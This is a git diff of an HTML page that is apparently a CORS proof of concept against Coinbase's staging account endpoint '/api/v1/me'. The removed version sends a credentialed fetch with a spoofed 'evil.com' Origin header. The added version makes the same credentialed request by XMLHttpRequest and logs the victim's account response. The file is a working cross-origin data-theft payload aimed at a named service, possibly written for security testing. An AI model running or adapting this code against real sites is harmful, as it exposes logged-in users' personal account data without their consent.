--- a/index.html
+++ b/index.html
@@ -1,29 +1,18 @@
 <!DOCTYPE html>
 <html>
-<head>
-  <title>Coinbase CORS Test</title>
-</head>
 <body>
-  <h2>CORS PoC: https://accounts-staging.cbhq.net/api/v1/me</h2>
-  <pre id="result">Testing...</pre>
-
+  <h3>CORS Test (XHR)</h3>
   <script>
-    fetch("https://accounts-staging.cbhq.net/api/v1/me", {
-      method: "GET",
-      credentials: "include", // cookie'yi tarayıcıdan ekler
-      headers: {
-        "Origin": "https://evil.com"
-      }
-    })
-    .then(response => response.text())
-    .then(data => {
-      document.getElementById("result").textContent = "Success:\n" + data;
-      console.log("✅ Response:", data);
-    })
-    .catch(err => {
-      document.getElementById("result").textContent = "Error:\n" + err;
-      console.error("❌ Error:", err);
-    });
+    var xhr = new XMLHttpRequest();
+    xhr.open("GET", "https://accounts-staging.cbhq.net/api/v1/me", true);
+    xhr.withCredentials = true;
+    xhr.onload = function() {
+      console.log("✅ Response:", xhr.responseText);
+    };
+    xhr.onerror = function(err) {
+      console.error("❌ XHR Error:", err);
+    };
+    xhr.send();
   </script>
 </body>
 </html>
